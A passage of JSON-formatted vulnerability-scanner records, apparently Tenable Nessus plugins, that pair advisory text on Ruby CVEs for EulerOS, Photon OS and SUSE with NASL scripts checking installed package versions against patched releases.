In Fiddle::Function.new 'initialize' heap buffer 'arg_types' allocation is made based on args array length. Specially constructed object passed as element of args array can increase this array size after mentioned allocation and cause heap overflow.(CVE-2016-2339)\n\n - Type confusion exists in _cancel_eval Ruby's TclTkIp class method. Attacker passing different type of object than String as 'retval' argument can cause arbitrary code execution.(CVE-2016-2337)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-05-01T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP1 : ruby (EulerOS-SA-2017-1050)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900", "CVE-2016-2337", "CVE-2016-2339"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ruby", "p-cpe:/a:huawei:euleros:ruby-irb", "p-cpe:/a:huawei:euleros:ruby-libs", "p-cpe:/a:huawei:euleros:rubygem-bigdecimal", "p-cpe:/a:huawei:euleros:rubygem-io-console", "p-cpe:/a:huawei:euleros:rubygem-json", "p-cpe:/a:huawei:euleros:rubygem-psych", "p-cpe:/a:huawei:euleros:rubygem-rdoc", "p-cpe:/a:huawei:euleros:rubygems", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1050.NASL", "href": "https://www.tenable.com/plugins/nessus/99895", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99895);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2015-3900\",\n \"CVE-2016-2337\",\n \"CVE-2016-2339\"\n );\n script_bugtraq_id(\n 75482\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : ruby (EulerOS-SA-2017-1050)\");\n script_summary(english:\"Checks the 
rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ruby packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - An exploitable heap overflow vulnerability exists in\n the Fiddle::Function.new 'initialize' function\n functionality of Ruby. In Fiddle::Function.new\n 'initialize' heap buffer 'arg_types' allocation is made\n based on args array length. Specially constructed\n object passed as element of args array can increase\n this array size after mentioned allocation and cause\n heap overflow.(CVE-2016-2339)\n\n - Type confusion exists in _cancel_eval Ruby's TclTkIp\n class method. Attacker passing different type of object\n than String as 'retval' argument can cause arbitrary\n code execution.(CVE-2016-2337)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1050\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b233fe7d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rubygem-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rubygem-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rubygem-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rubygem-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rubygem-rdoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rubygems\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"ruby-2.0.0.353-23.h4\",\n \"ruby-irb-2.0.0.353-23.h4\",\n \"ruby-libs-2.0.0.353-23.h4\",\n \"rubygem-bigdecimal-1.2.0-23.h4\",\n \"rubygem-io-console-0.4.2-23.h4\",\n \"rubygem-json-1.7.7-23.h4\",\n \"rubygem-psych-2.0.0-23.h4\",\n \"rubygem-rdoc-4.0.0-23.h4\",\n \"rubygems-2.0.14-23.h4\"];\n\nforeach 
(pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:00", "description": "An update of [ruby] packages for PhotonOS has been released.", "cvss3": {}, "published": "2018-08-17T00:00:00", "type": "nessus", "title": "Photon OS 1.0: Ruby PHSA-2017-0002 (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2339"], "modified": "2019-02-07T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:ruby", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2017-0002.NASL", "href": "https://www.tenable.com/plugins/nessus/111851", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2/7/2019\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0002. 
The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111851);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/02/07 18:59:50\");\n\n script_cve_id(\"CVE-2016-2339\");\n\n script_name(english:\"Photon OS 1.0: Ruby PHSA-2017-0002 (deprecated)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of [ruby] packages for PhotonOS has been released.\");\n # https://github.com/vmware/photon/wiki/Security-Updates-18\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a9d89ba7\");\n script_set_attribute(attribute:\"solution\", value:\"n/a.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-2339\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\npkgs = [\n \"ruby-2.4.0-1.ph1\",\n \"ruby-debuginfo-2.4.0-1.ph1\"\n];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"PhotonOS-1.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:26:19", "description": "An update of the ruby package has been released.", "cvss3": {}, "published": "2019-02-07T00:00:00", "type": "nessus", "title": "Photon OS 1.0: Ruby PHSA-2017-0002", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2339"], "modified": "2019-02-07T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:ruby", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2017-0002_RUBY.NASL", "href": "https://www.tenable.com/plugins/nessus/121666", "sourceData": "#\n# (C) Tenable Network Security, 
Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0002. The text\n# itself is copyright (C) VMware, Inc.\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121666);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2019/02/07\");\n\n script_cve_id(\"CVE-2016-2339\");\n\n script_name(english:\"Photon OS 1.0: Ruby PHSA-2017-0002\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the ruby package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-18.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-2339\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ruby-2.4.0-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ruby-debuginfo-2.4.0-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:12:57", "description": "This ruby2.1 update to version 2.1.9 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2016-2339: heap overflow vulnerability in the Fiddle::Function.new'initialize' (bsc#1018808)\n\n - CVE-2015-7551: Unsafe tainted string usage in Fiddle and DL (bsc#959495)\n\n - CVE-2015-3900: hostname validation does not work when fetching 
gems or making API requests (bsc#936032)\n\n - CVE-2015-1855: Ruby'a OpenSSL extension suffers a vulnerability through overly permissive matching of hostnames (bsc#926974)\n\n - CVE-2014-4975: off-by-one stack-based buffer overflow in the encodes() function (bsc#887877)\n\nBugfixes :\n\n - SUSEconnect doesn't handle domain wildcards in no_proxy environment variable properly (bsc#1014863)\n\n - Segmentation fault after pack & ioctl & unpack (bsc#909695)\n\n - Ruby:HTTP Header injection in 'net/http' (bsc#986630)\n\nChangeLog :\n\n- http://svn.ruby-lang.org/repos/ruby/tags/v2_1_9/ChangeLog\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "cvss3": {}, "published": "2017-05-01T00:00:00", "type": "nessus", "title": "openSUSE Security Update : ruby2.1 (openSUSE-2017-527)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4975", "CVE-2015-1855", "CVE-2015-3900", "CVE-2015-7551", "CVE-2016-2339"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libruby2_1-2_1", "p-cpe:/a:novell:opensuse:libruby2_1-2_1-debuginfo", "p-cpe:/a:novell:opensuse:ruby2.1", "p-cpe:/a:novell:opensuse:ruby2.1-debuginfo", "p-cpe:/a:novell:opensuse:ruby2.1-debugsource", "p-cpe:/a:novell:opensuse:ruby2.1-devel", "p-cpe:/a:novell:opensuse:ruby2.1-devel-extra", "p-cpe:/a:novell:opensuse:ruby2.1-doc-ri", "p-cpe:/a:novell:opensuse:ruby2.1-stdlib", "p-cpe:/a:novell:opensuse:ruby2.1-stdlib-debuginfo", "cpe:/o:novell:opensuse:42.1", "cpe:/o:novell:opensuse:42.2"], "id": "OPENSUSE-2017-527.NASL", "href": "https://www.tenable.com/plugins/nessus/99753", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-527.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99753);\n script_version(\"3.4\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-4975\", \"CVE-2015-1855\", \"CVE-2015-3900\", \"CVE-2015-7551\", \"CVE-2016-2339\");\n\n script_name(english:\"openSUSE Security Update : ruby2.1 (openSUSE-2017-527)\");\n script_summary(english:\"Check for the openSUSE-2017-527 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This ruby2.1 update to version 2.1.9 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2016-2339: heap overflow vulnerability in the\n Fiddle::Function.new'initialize' (bsc#1018808)\n\n - CVE-2015-7551: Unsafe tainted string usage in Fiddle and\n DL (bsc#959495)\n\n - CVE-2015-3900: hostname validation does not work when\n fetching gems or making API requests (bsc#936032)\n\n - CVE-2015-1855: Ruby'a OpenSSL extension suffers a\n vulnerability through overly permissive matching of\n hostnames (bsc#926974)\n\n - CVE-2014-4975: off-by-one stack-based buffer overflow in\n the encodes() function (bsc#887877)\n\nBugfixes :\n\n - SUSEconnect doesn't handle domain wildcards in no_proxy\n environment variable properly (bsc#1014863)\n\n - Segmentation fault after pack & ioctl & unpack\n (bsc#909695)\n\n - Ruby:HTTP Header injection in 'net/http' (bsc#986630)\n\nChangeLog :\n\n- http://svn.ruby-lang.org/repos/ruby/tags/v2_1_9/ChangeLog\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://svn.ruby-lang.org/repos/ruby/tags/v2_1_9/ChangeLog\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1014863\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1018808\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=887877\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=909695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=926974\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=936032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=959495\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=986630\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ruby2.1 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libruby2_1-2_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libruby2_1-2_1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-devel-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-doc-ri\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-stdlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-stdlib-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1|SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1 / 42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libruby2_1-2_1-2.1.9-10.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libruby2_1-2_1-debuginfo-2.1.9-10.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-2.1.9-10.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-debuginfo-2.1.9-10.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-debugsource-2.1.9-10.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-devel-2.1.9-10.2\") ) flag++;\nif ( 
rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-devel-extra-2.1.9-10.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-doc-ri-2.1.9-10.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-stdlib-2.1.9-10.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-stdlib-debuginfo-2.1.9-10.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libruby2_1-2_1-2.1.9-8.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libruby2_1-2_1-debuginfo-2.1.9-8.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.1-2.1.9-8.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.1-debuginfo-2.1.9-8.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.1-debugsource-2.1.9-8.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.1-devel-2.1.9-8.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.1-devel-extra-2.1.9-8.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.1-doc-ri-2.1.9-8.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.1-stdlib-2.1.9-8.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.1-stdlib-debuginfo-2.1.9-8.3.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libruby2_1-2_1 / libruby2_1-2_1-debuginfo / ruby2.1 / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:12:10", "description": "This ruby2.1 update to version 2.1.9 fixes the following issues:\nSecurity issues fixed :\n\n - CVE-2016-2339: heap overflow vulnerability in the Fiddle::Function.new'initialize' (bsc#1018808)\n\n - CVE-2015-7551: Unsafe tainted string usage in Fiddle and DL (bsc#959495)\n\n - 
CVE-2015-3900: hostname validation does not work when fetching gems or making API requests (bsc#936032)\n\n - CVE-2015-1855: Ruby'a OpenSSL extension suffers a vulnerability through overly permissive matching of hostnames (bsc#926974)\n\n - CVE-2014-4975: off-by-one stack-based buffer overflow in the encodes() function (bsc#887877) Bugfixes :\n\n - SUSEconnect doesn't handle domain wildcards in no_proxy environment variable properly (bsc#1014863)\n\n - Segmentation fault after pack & ioctl & unpack (bsc#909695)\n\n - Ruby:HTTP Header injection in 'net/http' (bsc#986630) ChangeLog :\n\n- http://svn.ruby-lang.org/repos/ruby/tags/v2_1_9/ChangeLog\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-04-21T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : ruby2.1 (SUSE-SU-2017:1067-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4975", "CVE-2015-1855", "CVE-2015-3900", "CVE-2015-7551", "CVE-2016-2339"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libruby2_1", "p-cpe:/a:novell:suse_linux:libruby2_1-2_1-debuginfo", "p-cpe:/a:novell:suse_linux:ruby2.1", "p-cpe:/a:novell:suse_linux:ruby2.1-debuginfo", "p-cpe:/a:novell:suse_linux:ruby2.1-debugsource", "p-cpe:/a:novell:suse_linux:ruby2.1-stdlib", "p-cpe:/a:novell:suse_linux:ruby2.1-stdlib-debuginfo", 